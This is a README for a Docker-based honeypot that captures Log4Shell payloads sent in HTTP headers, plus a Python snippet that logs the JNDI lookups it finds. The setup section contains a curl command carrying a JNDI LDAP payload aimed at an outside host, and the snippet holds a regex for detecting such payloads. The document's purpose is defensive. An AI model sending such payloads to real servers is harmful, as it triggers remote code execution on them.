## https://sploitus.com/exploit?id=32BB43C3-F80D-5CBF-83AD-55BD38C2A440
# log4shell-honeypot
Catch and download `log4shell` payloads sent within HTTP headers. A modified version of [Adikso's minecraft honeypot](https://github.com/Adikso/minecraft-log4j-honeypot), [sysgoblin's log4shell-honeypot](https://github.com/sysgoblin/log4shell-honeypot) and [LoginRadius](https://github.com/LoginRadius/awesome-login-pages).

## Setup
1. `git clone $repo`
2. `docker-compose up`
3. Send payloads within an HTTP header to `$dockerip:$port`

To add additional honeypots on different ports, copy and paste an existing service within `docker-compose.yml`, change the service name, and alter the ports within `ports` and `command`.

Example test request with the payload in the `User-Agent` header:
```bash
curl --user-agent '${jndi:ldap://lmao.com:1389/a}' http://localhost:80
```

Payloads are saved within `payloads/`.

Logs are printed to the screen by default, but can also be retrieved with `docker inspect`, e.g.:
```bash
docker inspect --format='{{.LogPath}}' log4shell-honeypot_http_1 | xargs cat
```
## ToDo
1. Fix display of static files (probably a proxy issue).
2. The log format needs to be modified to ISO 8601 and to match the format used in T-Pot (preferably JSON).
3. At the time of writing, the honeypot logs the requests sent; it would be nice if the username/password form could also log the sent payloads.
4. Make the front-end look a bit nicer.
5. Better testing environment. Maybe with a self hosted LDAP server to validate all functions.
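
One way to produce the JSON log lines with ISO 8601 timestamps that ToDo item 2 asks for, as an added example rather than this project's own code. The function and field names are assumptions and do not follow T-Pot's schema; the regex matches only the plain lookup form used in the curl test under Setup.

```python
import json
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Matches only the plain lookup form shown in the curl test above.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)


def extract_lookups(headers):
    """Return one dict per JNDI lookup string found in any header value."""
    hits = []
    for name, value in headers.items():
        for match in JNDI_RE.finditer(value):
            hit = {"header": name, "raw": match.group(0)}
            try:
                url = urlsplit(match.group(1))
                hit.update(scheme=url.scheme.lower(), host=url.hostname,
                           port=url.port, path=url.path)
            except ValueError:
                # Malformed URL (bad port, broken brackets): keep the raw
                # string so the request is still logged.
                hit["parse_error"] = True
            hits.append(hit)
    return hits


def log_event(src_ip, headers, now=None):
    """Build one JSON log line with an ISO 8601 UTC timestamp."""
    now = now or datetime.now(timezone.utc)
    event = {
        "timestamp": now.isoformat(timespec="milliseconds"),
        "src_ip": src_ip,
        "lookups": extract_lookups(headers),
    }
    return json.dumps(event, sort_keys=True)


if __name__ == "__main__":
    # Constructed sample request carrying the same payload as the curl test.
    sample = {
        "Host": "localhost",
        "User-Agent": "${jndi:ldap://lmao.com:1389/a}",
    }
    print(log_event("192.0.2.10", sample))
```

Requests whose lookup URL cannot be parsed are still recorded, with `parse_error` set and the raw string preserved.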